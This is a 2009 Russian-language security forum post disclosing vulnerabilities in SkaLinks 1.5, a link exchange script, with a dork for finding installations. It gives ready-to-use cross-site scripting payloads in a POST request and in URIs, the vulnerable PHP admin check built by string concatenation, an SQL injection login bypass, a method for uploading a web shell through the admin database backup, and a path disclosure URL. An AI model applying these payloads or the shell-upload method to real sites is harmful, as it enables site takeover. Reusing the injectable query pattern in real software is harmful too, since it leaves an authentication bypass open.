ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости SkaLinks
  #1  
Старый 29.01.2009, 21:55
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию Уязвимости SkaLinks

Уязвимости SkaLinks - Link Exchange Script

Product : SkaLinks
Version : 1.5
Dork : Powered by SkaLinks
Site: http://www.skalinks.com/
Founded by: Dimi4
Date : 29.01.09

Cross Site Scripting
/vuln/skalinks_1_5/add_url.php
Уязвимая переменная: link_url
Пример запроса:

Код:
POST /vuln/skalinks_1_5/add_url.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1
User-Agent: Mozilla/4.0
Content-Length: 288
Connection: Close

link_url="><script>alert()</script>&link_title=test&link_description=test&link_full_description=testtest&link_email=mail@address.com&cat=1&Form_submitted=Submit%20Link&letter_id=4
Уязвимая переменная: link_full_description,link_description
Код:
link_full_description=</textarea><script>alert()</script>

SQL-injection, Bypass
Обход авторизации в админке
Бажная функция:

PHP код:
function IsAdmin( )
    { 
        
$table_name $this->m_AdminsTable;
        
$res $this->db_Row"SELECT * FROM `$table_name` WHERE `Name`='".$_COOKIE['adminname']."' AND `Password`='".$_COOKIE['pwd']."'");
        if ( !
$res )
        {
            return 
0;
        }
        else
        {
            return 
$res;
        }
    } 
http://127.0.0.1/VULN/skalinks_1_5/admin/
Admin name : 1' OR 1=1/*
Cross Site Scripting in URI
Код:
http://127.0.0.1/vuln/skalinks_1_5/admin/index.php/>"><script>alert()</script>

http://127.0.0.1//vuln/skalinks_1_5/admin/register.php/>"><script>alert()</script>


http://127.0.0.1/vuln/skalinks_1_5/vuln/skalinks_1_5/search.php/>"><script>alert()</script>
Способ заливки шелла
Такой слособ прокатит только если криво выставлены права. Вообщем после удачного обхода авторизации, через дамп льем файл .htaccess. Содержимое:
Код:
allow from all
. Ясен пень, при кривых правах файл перезапишется. Далее спокойно, через тот же бекап спокойно льем шелл (/admin/db_backup).
Раскрытие путей
Код:
http://127.0.0.1/vuln/skalinks_1_5/search.php?url=test&Search=Search&search_type=URL

Последний раз редактировалось Dimi4; 29.01.2009 в 22:55..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Форумы 74 07.06.2010 16:19
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости 9 15.08.2009 15:08
В Windows Mobile найдено две уязвимости ground_zero Мировые новости 1 06.02.2007 11:40
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ